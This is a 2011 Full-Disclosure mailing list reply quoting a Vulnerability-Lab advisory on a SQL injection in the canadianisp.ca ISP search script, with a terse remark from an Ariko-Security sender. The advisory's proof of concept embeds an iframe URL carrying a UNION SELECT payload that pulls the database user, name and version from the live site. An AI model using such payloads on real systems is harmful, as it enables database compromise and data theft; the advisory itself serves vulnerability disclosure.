Re: Canadian ISP Website - SQL Injection Vulnerability

[MG <vuln () ariko-security com>]

Maybe we will post 20-40 pages per day in which we find critical vulnerabilities ?

....

MG


Wiadomość napisana przez research () vulnerability-lab com w dniu 4 paź 2011, o godz. 16:46:

> Title:
> ======
> Canadian ISP Website - SQL Injection Vulnerability
>
>
> Date:
> =====
> 2011-09-23
>
>
>
> VL-ID:
> =====
> 282
>
>
> Reference:
> ==========
> http://www.vulnerability-lab.com/get_content.php?id=282
>
>
> Introduction:
> =============
> Canadianisp.ca - Is a wholly owned project of Marc Bissonnette /
> InternAlysis.
> It was originally created as a joint venture with Bob Carrick of Carrick
> Solutions, with sole ownership
> transferring to Marc Bissonnette on February 16th, 2004. Canadianisp.ca
> is the only website that allows
> you to search for an Internet service provider (Dial-up, ISDN, DSL,
> Cable, Satellite, Point to Point, Wireless
> and Voice Over IP (VoIP)) anywhere in Canada. Customers can post
> reviews, and ISPs submit their own services.
> All for free. CanadianISP is also one of the most accurate and most
> up-to-date ISP lists on the net. There are
> many ISP lists out there, but the vast majority of them (as far as we
> have seen and we last searched and looked
> in April of 2011) are out of date, listing companies no longer in
> business, no longer providing connectivity
> or simply pages of ads with no relevance to the users  search parameters.
> ISPs can submit and edit / update their own services at all times, free
> of charge.
>
> (Copy of the Vendor Homepage: www.canadianisp.ca/about.htm)
>
>
> Abstract:
> =========
> Vulnerability-Lab Team discovered a critical remote SQL Injection
> vulnerability on the Canadian ISP main vendor website.
>
>
> Report-Timeline:
> ================
> 2011-09-24: Vendor Notification
> 2011-10-03: Vendor Response/Feedback
> 2011-10-04: Vendor Fix/Patch
> 2011-10-04: Public or Non-Public Disclosure
>
>
> Status:
> ========
> Published
>
>
> Affected Products:
> ==================
> Canadian ISP Website - 2011/Q2-3
>
>
> Exploitation-Technique:
> =======================
> Remote
>
>
> Severity:
> =========
> Critical
>
>
> Details:
> ========
> A SQL Injection vulnerability is detected on canadians isp website. The
> bug allows remote attackers to inject/execute
> own sql statements/commands over a vulnerable applicataion parameter on
> the main web service. Successful exploitation
> of the remote sql injection vulnerability can result in database
> managemtn system compromise & website manipulations.
>
> Vulnerable Module(s):
>                        [+] ispsearch.cgi
>
> Vulnerable Param(s):
>                        [+] ispid
>
>
> Pictures:
>                        ../1.png
>
>
> Proof of Concept:
> =================
> The vulnerability can be exploited by remote attackers without user
> inter action. For demonstration or reproduce ...
>
> <html>
> <head><body>
> <title>Remote SQL Injection PoC - CANADIAN ISP</title>
> <iframe
> src=http://www.canadianisp.ca/cgi-bin/ispsearch.cgi?f=ShowDetail&ispid=19+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,
> 48,49,50,51,52,53,54,55,56,57,58,concat_ws%280x3a3a,user%28%29,database%28%29,version%28%29%29,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,
> 101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,
> 135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,
> 169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,
> 203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,
> 237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,
> 271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,
> 305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,
> 339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,
> 373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,
> 407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,
> 441,442,443,444,445,446,447-->
> <br><br>
> </body></head>
> </html>
>
>
> Risk:
> =====
> The security risk of the remote sql injection vulnerability is estimated
> as critical.
>
>
> Credits:
> ========
> Vulnerability Research Laboratory - Chokri B.A. (Me!ster) [TN]
>
>
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without
> any warranty. Vulnerability-Lab disclaims all warranties,
> either expressed or implied, including the warranties of merchantability
> and capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including
> direct, indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers
> have been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation
> may not apply. Any modified copy or reproduction, including partially
> usages, of this file requires authorization from Vulnerability-
> Lab. Permission to electronically redistribute this alert in its
> unmodified form is granted. All other rights, including the use of
> other media, are reserved by Vulnerability-Lab or its suppliers.
>
>                            Copyright © 2011|Vulnerability-Lab
>
> -- 
> Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
> Contact: admin () vulnerability-lab com or support () vulnerability-lab com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Ariko-Security
Rynek Glowny 12
32-600 Oswiecim
tel:. +48 33 4741511 mobile: +48 784086818
(Mo-Fr 10.00-20.00 CET)

Ariko-Security Sp. z o.o. z siedzibą w Oświęcimiu , zarejestrowana przez Sąd Rejonowy dla m. Krakowa-Śródmieścia, XII 
Wydział Gospodarczy Krajowego Rejestru Sądowego, KRS: 00000358273, NIP: 549-239-90-67, REGON 121262172








_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/